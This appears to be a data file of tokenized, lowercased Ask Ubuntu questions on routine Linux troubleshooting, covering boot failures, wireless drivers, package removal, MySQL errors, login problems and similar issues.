390404	strange update : `` safe and easy web browser from mozilla firefox ''	following one or two updates i have now mozilla firefox version 25.0.1 installed on ubuntu , which works fine . today i noticed that the ubuntu update manager is suggesting me to install a strange `` safe and easy web browser from mozilla firefox '' ( 30.6 mb ) update , along with a transitional package , and english , hungarian language packs , which is strange , because i have already both english and hungarian language packs for firefox 25.0.1 installed . as i know firefox 25.0.1 is the currently latest version , and firefox updates comes always with a new identifying sub-number ( not named ) , without language packs . has anyone received such a huge update with that name ? what is this ? a new , second browser from firefox , a security update ( too large for that , and why sent with language packs ) , or was it sent by mistake ? do i need it at all ?
390408	problem in alienwarex51 efidisk : error : efidisk read error	i have the graphics card nvidia geforce 660 i have wanted linux for quite some time . i finally decided to make a live-usb . first i had an issue with atp config . then i switched back over to windows 8 just to decide witch i liked better ( i did wipe my 1tb drive ) . after i install and boot up the first boot in goes 100 % smooth , but the next not so much . i 'm met with a purple-screen goes to black then makes a noise . i 'm not familiar with after i met with three lines of text that quickly flash that says : error : efidisk read error i would like to know if there is a way around this or something like that edit : after i reinstall and reboot , i have installed ! . no extra programs .
390413	there seems to be a difference between .bash_history and what up arrow displays , where does the up arrow get it 's data ?	i seem to have discovered that the ~/.bash_history file does n't contain what is displayed when you use the up arrow . i found this by doing a command like so $ smbclient -l 10.2.10.240 -umyuser -p '' mypassword on the command line is bad '' this command is actually wrong , it has a mistake , the -u is actually supposed to be a -u and so this command failed . however i also realized that that was bad to do , because it puts your password into the history , i went into .bash_history and what was interesting was that it does n't have the mistake . it only has smbclient -l 10.2.10.240 and that 's it . but this is were it gets weird , if you use the up arrow the whole command including mistakes is there for you to edit . so the question is , why is there a difference between what is in .bash_history and what the up arrow displays ? where does the up arrow data live ? before you point it out ; it 's quite convenient in this case because it prevents my password from being saved , but , that 's not why it 's doing this , i also tested it with correct options and then it does save the whole command including passwords and all .
390418	laptop wo n't connect to wireless after 13.10 update	this morning i went ahead and ran the software updater to upgrade my ubuntu which was at 13.04 to the newer 13.10 . the upgrade went smoothly until i rebooted the laptop , i can see my wireless and attempt to connect with it but after a few seconds of trying the laptop gives up and disconnects , currently the only way to get onto the internet is to hard wire it to my router . these are the terminal output for the following commands sudo lshw -class network *-network description : wireless interface product : rt3290 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 08:3e:8e:00 : df:1d width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.11.0-14-generic firmware=0.37 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:49 memory : f0210000-f021ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 05 serial : 28:92:4a:4d:3b:5a size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.2.11 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:48 ioport:2000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff lsusb bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 05c8:0348 cheng uei precision industry co. , ltd ( foxlink ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root complex 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] trinity [ radeon hd 7420g ] 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] trinity hdmi audio controller 00:04.0 pci bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root port 00:10.0 usb controller : advanced micro devices , inc. [ amd ] fch usb xhci controller ( rev 03 ) 00:10.1 usb controller : advanced micro devices , inc. [ amd ] fch usb xhci controller ( rev 03 ) 00:11.0 sata controller : advanced micro devices , inc. [ amd ] fch sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 11 ) 00:13.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) 00:13.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 11 ) 00:14.0 smbus : advanced micro devices , inc. [ amd ] fch smbus controller ( rev 14 ) 00:14.2 audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd ] fch lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd ] fch pci bridge ( rev 40 ) 00:15.0 pci bridge : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 0 ) 00:15.1 pci bridge : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 1 ) 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 0 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 1 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 2 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 3 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 4 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 5 02:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 02:00.1 bluetooth : ralink corp. rt3290 bluetooth 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) i got these commands from another forum that suggested to post the out puts . any and all help would be appreciated thank you for your time .
390426	is it possible to turn trackpad on/off manually ?	i would like to configure my ubuntu such that i can use command line to say when the trackpad should register mouse moves and clicks and when not . is that possible to do ? and can i do it such that my usb-mouse would work all the time ? i tried to follow answer given in how to disable touchpad ? but there were no trackpad in the list : jaakko @ jaakko-vpceb1s1e : ~ $ xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=10 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=11 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps glidepoint id=13 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 mouse id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ sony vaio keys id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ usb 2.0 camera id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] jaakko @ jaakko-vpceb1s1e : ~ $
390431	can not boot either windows 8 or ubuntu after installing ubuntu	i have a hp envy desktop that i wanted to dual boot . i used a usb flash drive and installed ubuntu alongside windows . after restarting my computer , i was unable to load windows , so i used the boot-repair while in legacy mode . i was able to get back into windows , but after restrating my computer i was not able to get into either windows or ubuntu and now the machine wont boot to either os . it only boots from usb . if i have the usb i used to install linux in the port before i start the machine , it goes directly to the grub menu where you can choose either to install or try ubuntu . when there is no flash drive in the port , then i get a message about a failed boot disc . i have tried changing the boot order as well as restoring all default settings . still nothing is working . i am new to the uefi and ubuntu and have never dual booted with the uefi interface .
390438	installing kfaenza icons on kubuntu	i am unable to install the kfaenza icon set . steps tried : in the application appearance section of the kde system settings , i clicked on the “download new designs” button . a dialogue pops up which allows you to browse different designs . when clicking on “install” , a few options turn up ( apparently different versions ) . clicking any option leads to an error . i visited the corresponding opendesktop.org page for the kfaenza icon set . below the description , an array of download options is available . they lead to an expired paste and to “omploader.org” which does not contain a website ( the dns record does not seem to be set up ) . the opendesktop page also has various comments complaining that the resources have vanished , but offer no solution . how can i install the faenza icon set for kde ? i could copy the icons over from an old install , but i 'd rather not sudo cp something into system folders if avoidable .
390440	i want to uninstall python3 and just use 2.7	i typed in this to the terminal : sudo apt-get remove python3 and it gave me the following output : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : fonts-dejavu-extra gir1.2-secret-1 icedtea-netx-common libbonobo2-0 libbonobo2-common libcpufreq0 libgconf2-4 libgif4 libgnome2-0 libgnome2-bin libgnome2-common libgnomevfs2-0 libgnomevfs2-common libidl-common libidl0 liborbit2 tzdata-java use 'apt-get autoremove ' to remove them . the following packages will be removed : apparmor apport apport-gtk aptdaemon apturl apturl-common bluez bluez-alsa bluez-gstreamer checkbox checkbox-qt command-not-found deja-dup-backend-ubuntuone dh-python firefox flashplugin-installer foomatic-db-compressed-ppds friends friends-dispatcher friends-facebook friends-twitter gedit gnome-bluetooth gnome-control-center gnome-control-center-datetime gnome-control-center-signon gnome-control-center-unity gnome-menus gnome-orca gnome-user-share indicator-bluetooth indicator-cpufreq language-selector-common language-selector-gnome libfriends0 lightdm-remote-session-uccsconfigure lsb-release nautilus-share onboard onboard-data oneconf openprinting-ppds printer-driver-foo2zjs printer-driver-postscript-hp printer-driver-ptouch printer-driver-pxljr python-commandnotfound python-ubuntuone-client python-ubuntuone-control-panel python3 python3-apport python3-apt python3-aptdaemon python3-aptdaemon.gtk3widgets python3-aptdaemon.pkcompat python3-brlapi python3-cairo python3-chardet python3-commandnotfound python3-crypto python3-dbus python3-debian python3-defer python3-dirspec python3-distupgrade python3-feedparser python3-gdbm python3-gi python3-gi-cairo python3-httplib2 python3-louis python3-lxml python3-mako python3-markupsafe python3-oauthlib python3-oneconf python3-piston-mini-client python3-pkg-resources python3-problem-report python3-pyatspi python3-six python3-software-properties python3-speechd python3-uno python3-update-manager python3-xdg python3-xkit rhythmbox rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugins rhythmbox-ubuntuone sessioninstaller software-center software-center-aptdaemon-plugins software-properties-common software-properties-gtk system-config-printer-gnome thin-client-config-agent ttf-mscorefonts-installer ubuntu-desktop ubuntu-drivers-common ubuntu-minimal ubuntu-release-upgrader-core ubuntu-release-upgrader-gtk ubuntu-standard ubuntuone-client ubuntuone-control-panel ubuntuone-control-panel-qt ufw unattended-upgrades unity-lens-friends unity-lens-photos unity-scope-audacious unity-scope-calculator unity-scope-chromiumbookmarks unity-scope-clementine unity-scope-colourlovers unity-scope-devhelp unity-scope-firefoxbookmarks unity-scope-gdrive unity-scope-gmusicbrowser unity-scope-gourmet unity-scope-guayadeque unity-scope-home unity-scope-manpages unity-scope-musique unity-scope-openclipart unity-scope-texdoc unity-scope-tomboy unity-scope-virtualbox unity-scope-yelp unity-scope-zotero unity-tweak-tool update-manager update-manager-core update-notifier update-notifier-common usb-creator-common usb-creator-gtk webaccounts-extension-common xdiagnose xul-ext-ubufox xul-ext-unity xul-ext-webaccounts 0 upgraded , 0 newly installed , 147 to remove and 1 not upgraded . after this operation , 162 mb disk space will be freed . do you want to continue [ y/n ] ? n why does it ask me to uninstall all of that other stuff ? problems from a linux noob : /
390442	what should i do to complete ubuntu upgrade ?	i have been trying to upgrade from ubuntu 13.04 to latest avaiable version , but i keep getting unsolvable problem error message and update process terminates after rolling back . here is my log file ( apt.log from /var/log/dist-upgrade ) : http : //paste.ubuntu.com/6568967/ . it has a bunch of `` holding back '' messages related to certain packages ( namely libgjs0d : i386 , gnome-shell : i386 to give an example ) . what should i do for upgrade to go on through ? should i just go and purge them ? what if a chunk of the system depends of them ( which as i fear may be the case ) ? p.s . output of apt-get check : reading package lists ... done building dependency tree reading state information ... done contents of /etc/apt/sources.list : http : //paste.ubuntu.com/6570863/ output of lsb_release -a : no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring
390443	is there a way to change theme only for one application	i have a gnome theme that i like but it looks awful in eclipse . is there a way to set eclipse to default theme and keep all other programs on my current theme ?
390448	why kate ca n't edit my tex-file	i tried to edit a file by using kate . but it said my file is read only ( r/o ) . how can i change that ? i tried sudo chmod a+rw kirjeet.tex & kate kirjeet.tex
390449	can i remove telepathy mission control 5 w/o removing gnome shell ?	am running ubuntu gnome 13.04 . i regularly have crashes of telepathy mission control 5 . i do n't use empathy or any other voip service . when i went to remove telepathy the system indicated it will also remove gnome and gnome-shell .
390451	cant get ettercap to work	i have read a lot on networking in an attempt to demonstrate the attacks on my own network and be able to defend against them . but ettercap refuses to work on my mon0 interface or any interface . for that matter thats on monitor mode it always force closes when i select the interface i have setup with monitor mode . i thaught it was an issue with the version 8 i built from source . so painfully i removed all the files for that and use apt-get install ettercap-common to get the version 7.4 . the same thing happens here minus the error i use to get on 8 saying it was a lib error unrecognized physical adress . the monitor interfaces i setup do seem to have strange looking mac adresses . here is sudo ifconfig : eth0 link encap : ethernet -- -- taken out -- -- -- -- - up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2757 errors:0 dropped:0 overruns:0 frame:0 tx packets:2757 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:439267 ( 439.2 kb ) tx bytes:439267 ( 439.2 kb ) mon0 link encap : unspec hwaddr c0-18-85-1e-5f-af-00-00-00-00-00-00-00-00-00-00 up broadcast running multicast mtu:1500 metric:1 rx packets:1831 errors:0 dropped:1837 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:127674 ( 127.6 kb ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr -- -- -- taken out -- -- -- -- - inet addr:192.168.0.2 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :c218:85ff : fe1e:5faf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:59346 errors:0 dropped:20699 overruns:0 frame:0 tx packets:27494 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:41515637 ( 41.5 mb ) tx bytes:4379419 ( 4.3 m b ) here is airmon-ng setup output . so you know drivers and all . found 5 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! -e pid name 889 avahi-daemon 890 avahi-daemon 896 networkmanager 997 wpa_supplicant 25852 dhclient process with pid 25852 ( dhclient ) is running on interface wlan0 interface chipset driver wlan0 atheros ar9287 ath9k - [ phy0 ] ( monitor mode enabled on mon0 ) also probably worth a mention i have updated drivers . how to resolve this ?
390452	type password into login screen , hit enter - nothing happens	i first install ubuntu 13.10 a few weeks ago and its been going great . i 'm still pretty new to linux , so i have n't been doing a whole lot . the past couple days i 've tried installing lamp , then uninstalled it because i would probably never do anything with it . i then installed ssh , then uninstalled it because i probably would never login to it remotely . then i install samba so my wife could access the files on my computer from hers and use my pc as a backup . all is fine and well ... until i reboot . i am unable to login . i type my password into the password field , and hit enter and nothing happens . if i type the wrong password in , the little wheel spins for 1/2 second then says 'incorrect password ' . with the incorrect password , no wheel shows up - the password field fades away and the screen just sits there . i 've waited about 10-15 minutes for something to happen , but nothing does . i 've tried to google around to solve the issue , but nothing i 've seen seems to do the trick . i am able to login through the command line ( ctrl-alt-f1 ) just fine , just am not able to login in through the gui . ive looked at my auth.log and found this : lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` andrew '' i remember seeing something about pam when i was installing/configuring ssh and/or configuring keys for it , but i do n't remember specifically what . plus , i removed ssh shortly after i installed it - so could it still be causing an issue ? i 've tried the following : sudo dpkg-reconfigure lightdm which says nothing and returns me back to the command prompt i have tried removing ~/.xauthority - which did n't help . my .dmrc file is about four lines . the first two are blank , then [ desktop ] , then something=ubuntu i have tried : pam-auth-update everything is checked , does n't help and i 've tried : ppa-purge ppa : gnome3-team/gnome3 which does n't help either . i 've tried renaming my home directory and creating a new one . no luck . i 'm at a loss of what else i can do . any ideas ?
390457	how to install the latest ipython notebook in ubuntu 12.04 ?	the solution here asks to install the latest notebook , but i was unable to find how to do so . http : //stackoverflow.com/questions/16496687/unable-to-open-an-existing-notebook-in-ipython-notebook
390459	x2x keyboard layout / keymap switch between machines	i 've just started using x2x to control my pc from my laptop and it works quite beautifully . while doing so , it exceeds what i 've wished for . there is a little problem to it though . on the pc i 'm using a german layout ( since i 've not found an equivalent us keyboard yet ) , on my thinkpad a us one . using x2x i 'm not only loosing all my neat changes to the keymap i 've made , i 'm also switching input-languages again , with a yet completely different layout . is there a way to either : have the x2x `` keyboard '' in a different language than the local one simply forward what character would be typed on the remote machine ( laptop )
390461	how to connect to wifi on ubuntu phone	i just put ubuntu 13.10 on my brother 's nexus 4 and it looks great but i ca n't seem to figure out how to connect to any wifi connections . when i go to the wifi settings page i get no options other than `` auto-join previous networks . '' i 've looked around and ca n't seem to find anything either on the internet or the phone that would help . edit : i found out that apparently android 4.4 radio firmware is not compatible with ubuntu ( how to use wifi connection on nexus 4 ? ) . how do i fix this ? is there any way around this ?
390464	ca n't create database . error : 2	ubuntu server 12.04 mysql server : 5.5.34 error : error 1006 ( hy000 ) : ca n't create database 'testdb ' ( errno : 2 ) passwd file : mysql : x:106:114 : mysql server , , , :/nonexistent : /bin/false /var/lib/mysql # ls -la : total 28696 drwx -- -- -- 5 mysql mysql 4096 dec 13 05:55 . drwxr-xr-x 43 root root 4096 dec 13 16:48 .. -rw-r -- r -- 1 mysql mysql 0 dec 13 05:55 debian-5.5.flag -rw-rw -- -- 1 mysql mysql 18874368 dec 13 05:55 ibdata1 -rw-rw -- -- 1 mysql mysql 5242880 dec 13 05:55 ib_logfile0 -rw-rw -- -- 1 mysql mysql 5242880 dec 13 05:55 ib_logfile1 drwx -- -- -- 2 mysql mysql 4096 dec 13 05:55 mysql -rw-rw -- -- 1 mysql mysql 6 dec 13 05:55 mysql_upgrade_info drwx -- -- -- 2 mysql mysql 4096 dec 13 05:55 performance_schema drwx -- -- -- 2 mysql mysql 4096 dec 13 05:55 test i 've been at this for hours and i ca n't figure out what 's wrong . is it permissions ? i 'm lost .
390465	how to remove the switch user account option in unity 2d ?	we are looking for a way to permanently remove the switch user account function from our install of ubuntu unity . note , this function appears when you right or left click on the user name in the upper right-hand corner . it then displays a list of 5-10 users that have logged in along with the option to switch user account . we know that we can do this by defaulting to gnome , but we would like the option of using unity as well , but without the switch user account option . we have already tried dconf-editor , gsettings and several other options to remove the users name list , switch user account option from appearing in the drop-down list . we know this can be done for one user at a time , but we are wanting to do this for all users on roughly 160 workstations . some options that we have already tried are : how to permanently disable user switching in gnome 3 ? http : //ubuntu.5.x6.nabble.com/remove-switch-user-from-unity-top-left-menu-on-precise-td4933613.html this is a visual of what we are trying to remove :
390466	lubuntu wo n't display on both monitors at the same time	i can get lubuntu 13.10 to display my desktop on either screen , but it refuses to display on both at the same time . changing the resolution of a screen generally toggles which screen is displayed ; using arandr does not solve the issue . my graphics card is a radeon hd6380g ; i 've had ubuntu 12.04 working on this before so i 'm absolutely stumped edit : i actually got this to work using the proprietary drivers , which is the opposite of what most guides say : sudo apt-get install figlrx sudo aticonfig -- initial sudo reboot now monitors work fine now
390470	how to remove packages listed by dpkg	i apologise in advance : this question has probably been asked about 100 times but i ca n't seem to find a solution . my problem : i 'm trying to remove qt creator ( and everything else qt-related ) from my laptop because i have been experiencing this problem with qt creator 2.8 . having entered the command dpkg -- get-selections | grep qt , i get a list of about 20-30 packages . most of these packages are listed as install but some are listed as either deinstall or purge . when i attempt to apt-get purge the packages listed as purge or deinstall , i am informed that the package in question is not installed on my system . why are the packages still listed when i have removed them ? 1 ) is there a way to remove all packages containing a specific keyword ( e.g . by using grep ) ? 2 ) why are some packages listed as purge or deinstall ? i read somewhere that the command apt-get dselect-upgrade will perform these operations but this but that did not work . 3 ) why is dpkg giving me a list of packaged that includes packages that i have removed ? there 's obviously a lot i have to learn about package management in ubuntu , any help is appreciated . i am using ubuntu 13.10 .
390472	how do i change mah jongg from the ziggurat ?	mah jongg as installed in precise is stuck at the ziggurat , and wo n't give me any other setting . how can i release it ?
390474	log location for failed webmin login attempts ?	when logging into webmin from my remote laptop browser i entered my password into the `` user '' text box by accident . in the past , if i ever enter a password in cleartext anywhere , i create a new password . i do n't want to do that if i can help it ... i just assembled and setup a server running ubuntuserver 12.04 . i 'm the only root user . i have n't even added other users , but plan to do so in the near future for guest access . i looked inside /var/log/auth.log and can see : dec 13 17:09:07 glados webmin [ 4765 ] : invalid login as from 12.34.56.78 dec 13 17:09:11 glados perl [ 4766 ] : pam_unix ( webmin : auth ) : authentication failure ; logname= uid=0 euid=0 tty=10000 ruser= rhost=12.34.56.78 user=root dec 13 17:09:13 glados webmin [ 4766 ] : invalid login as root from 12.34.56.78 dec 13 17:09:17 glados perl [ 4775 ] : pam_unix ( webmin : auth ) : authentication failure ; logname= uid=0 euid=0 tty=10000 ruser= rhost=12.34.56.78 user=root the bolded text above does n't show the login name , if i am interpreting this log file correctly . i included another failed login attempt ( 17:09:13 ) which shows that root tried logging in . is there another location that would contain more logs ? this is my first time setting up a server , i 'd appreciate any help . thank you . ~~~~~~~~~~~~~~~~~~ edit : i played around with the login system ... i tried logging in as non-existent user `` shirley '' and the log showed a failed attempt by `` shirley '' . is the program smart enough to not log the password as a username ? i ran cat auth.log | grep part_of_my_password and could n't find anything . i 'm thinking i 'm clear ... unless there is another logging location .
390478	ca n't hear people on skype	since i installed ubuntu it has been wonderful and im a noob with it but there is just one issue . i ca n't hear over skype im wondering if thereâs a fix thanks in advance skype sound panel - http : //i.imgur.com/funv9pf.png
390480	why is my machine not showing anything when booting ?	i 'm using ubuntu server 11.10 x86 , and after i make my normal selection ( ubuntu , with linux 3.0.0-12-generic-pae ) from the grub menu , the screen just goes blank - there 's not even a cursor showing up . basically i ( suspect that i ) had a bad nfs mount tying up the boot process so i fixed that and now it seems like the boot is actually worse off . here 's the problem i had before : http : //serverfault.com/questions/561062/is-a-bad-nfs-mount-preventing-a-clean-boot not sure if this is useful , but when i hit the 'e ' key in the grub menu , this is the configuration that shows up : setparams 'ubuntu , with linux 3.0.0-12-generic-pae' recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root < long hex value > linux /vmlinuz-3.0.0-12-generic-pae root=uuid= < another long hex value > ro initrd /initrd.img-3.0.0-12-generic-pae recovery mode works just fine , networking and all . in fact , if select recovery mode it actually brings up the following menu : recover menu ( limited read-only menu ) resume - resume normal boot fsck - check all file systems ( will exit read-only mode ) remount - remount / read/write and mount all other file systems root - drop to root shell prompt and if i select resume i get the following output : < timestamp > tpm_tis 00:00 : tpm_transmit : tpm_send : error 4294967234 initctl : event failed ubuntu 11.10 < server > tty1 < server > login : everything works fine after that . other things i 've noticed : 1 ) when booting normally , the num lock and scroll lock lights on they keyboard show ( after pressing the corresponding keys ) , but the caps lock doesn't 2 ) ctrl+alt+fx to switch tty 's does n't work 3 ) this link does n't help much : https : //wiki.ubuntu.com/x/troubleshooting/blankscreen so , back to the original question : why is my machine not showing anything when booting ( in non-recovery mode ) ?
390485	how to get users accounts info on ubuntu desktop using mono c # ?	is there an mono c # class or lib their can retrieve info abort all local users accounts on a ubuntu/ linux system ? for ubuntu systems their is not on an domain-controller .
390487	my port is allowed by ufw but remains closed and connection is denied by ubuntu qbittorrent , why ?	my incoming port is allowed by ufw but remains closed and connection is denied by ubuntu qbittorrent , why ? ps : i have open dns please help ! thanks !
390488	problem with uploading files with filezilla	i 'm running a nginx server on ubuntu server 12.04.3 lts but unfortunately i 'm not being able to upload files with filezilla to it . i am able to open and browse the machine with filezilla but whenever i try to upload something i get the following message error ... open for write : permission denied . any ideia on how to solve this ? my server is encrypted lvm but i do n't know what else should suit you to help me ...
390493	keyboard not respondiing after installing ubuntu	i installed ubuntu and made sure the keyboard was recognized at that section of the install . at the end of the installation it asks to remove the disk and hit enter . the keyboard does not respond and i 'm stuck on that screen . what next ?
390496	how to get dodge windows and minimize on click for unity in ubuntu 13.10	i would like to have this on ubuntu 13.10 the solutions in this post http : //www.webupd8.org/2012/05/how-to-get-dodge-windows-and-minimize.html doesnt'work actually . i install ccsm and the option is not present
390499	where do i make a suggestion for a feature in unity ?	what website do i use to make a feature suggestion for use in unity ?
390503	my ext4 sda1 has to be remounted everytime during boot	my sda1 gets mounted fine , but looking through the boot log , i see that it encounters some sorts of errors and has to be remounted every time . is this normal ? how may i fix it ? here is the result of dmesg | grep -b1 sda1 [ 1.748437 ] switching to clocksource tsc [ 1.759038 ] sda : sda1 -- [ 2.692041 ] ata6 : sata link down ( sstatus 0 scontrol 300 ) [ 7.861625 ] ext4-fs ( sda1 ) : info : recovery required on readonly filesystem [ 7.861633 ] ext4-fs ( sda1 ) : write access will be enabled during recovery [ 9.034062 ] ext4-fs ( sda1 ) : orphan cleanup on readonly fs [ 9.034077 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838308 [ 9.034105 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838306 [ 9.034112 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838304 [ 9.034152 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838305 [ 9.034159 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838303 [ 9.034165 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838302 [ 9.034177 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838301 [ 9.034183 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838300 [ 9.034194 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838299 [ 9.034200 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838296 [ 9.034211 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838294 [ 9.034217 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838290 [ 9.034229 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838243 [ 9.034236 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838237 [ 9.034248 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1836291 [ 9.034255 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 1838232 [ 9.034267 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 8257577 [ 9.034273 ] ext4-fs ( sda1 ) : 17 orphan inodes deleted [ 9.034278 ] ext4-fs ( sda1 ) : recovery complete [ 9.150188 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 10.466132 ] init : ureadahead main process ( 303 ) terminated with status 5 [ 13.967407 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro
390508	how to change eclipse console output color ?	i am running eclipse on ubuntu 12.04 and i 'd like to change console output color . i tried to edit it via preferences > run/debug > console > background color but it does n't work . is there some other way to change ?
390512	ubuntu x64 on x32 processor	my question is about if i can install ( ubuntu 12.04 , 64-bit ) on my machine if my processor is 32-bit core2duo 2,20ghz , 4gb ram ?
390519	printer connexion problem with hp laserjet pro 200 m251nw	well , i 'm a learning newbie with ubuntu . recently got a printer , and now trying to fiure out how to have it work . the printer is recognized ( it is listed on the print option on both open office and firefox ) and seem to be installed properly . when i send a job , it turns out that it never go through . the notification icon just keeps piling up . i tried a vm machine with windows , and that i ca n't even install the printer . thanks for your time and thinking ! charles
390521	is there a way to reduce performance once a temperature threshold is reached	my laptop ( toshiba satellite l655 - 1e8 ) overheats ( and shuts down ) . often . i was wondering if there is a way to reduce performance once the temperature reaches a certain threshold . thanks ! p.s . i 'm not doing anything very resource-intensive ... it sometimes overheats while just watching a flash video on chromium . anything more and its practically guaranteed to happen after a while . i did clean the fan , but perhaps not well enough .
